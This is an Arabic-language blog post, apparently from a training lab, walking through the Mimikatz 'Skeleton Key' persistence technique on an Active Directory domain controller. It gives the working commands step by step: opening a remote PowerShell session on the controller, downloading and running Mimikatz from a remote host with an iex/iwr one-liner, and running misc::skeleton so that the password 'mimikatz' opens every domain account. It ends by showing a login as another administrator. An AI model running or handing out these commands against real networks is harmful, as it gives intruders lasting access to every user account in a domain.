Persistence - Skeleton Key

Jehad Alqurashiمنذ سنتين

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

 

في المقالة هذي راح اشرح التكنيك الثالث لتثبيت الاختراق على ال Domain Controller


ايش هو تكنيك Skeleton Key؟

فكرة هذا التكنيك انه يتم تحويل جميع كلمات المرور الخاصة بجميع المتسخدمين المضمنين في ال Active Directory الى باسورد اخر اللي وهو  mimikatz مع بقاء فعالية الباسورد السابق الخاص فيهم
 

الشرح:


طبعا عشان نطبق التكنيك لازم نشغل جلسة PowerShell بمستخدم ضمن قروب Domain Admins

اول شي راح ندخل لجهاز Domain Controller عن طريق هذا الامر:
 

Enter-PSSession -ComputerName dcorp-dc

بعد كذا راح نسوي تشغيل الى http server على نفس المسار اللي موجودة فيه Mimikatz

الان راح اسوي Load ل اداة Mimikatz عن طريق هذا الامر:

iex (iwr http://172.16.100.7/Invoke-Mimikatz.ps1 -UseBasicParsing)


بعد كذا ننفذ هذا الامر:

 

Invoke-Mimikatz -Command '"misc::skeleton"'

الان تم اضافة باسورد الى كل مستخدم واللي هو mimikatz مع ضمان فعالية الباسورد السابق الخاص فيهم



الان خلونا نشوف اي مستخدم اخر مثلا يكون موجود في قروب Domain Admins مثلا المتسخدم svcadmin هل نقدر ندخل على جلسة PowerShell  خاصه فيه عن طريق الباسورد mimikatz او لا


 

 

قدرنا نشغل جلسة PowerShell بصلاحية المستخدم svcadmin ونقدر ايضا ب اي مستخدم مضمن في ال Active Directory

 

وصلنا الى نهاية المقالة



شاكر لكم.

كلمات دليلية: hacking
0
إعجاب
1364
مشاهدات
0
مشاركة
1
متابع

التعليقات (0)

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !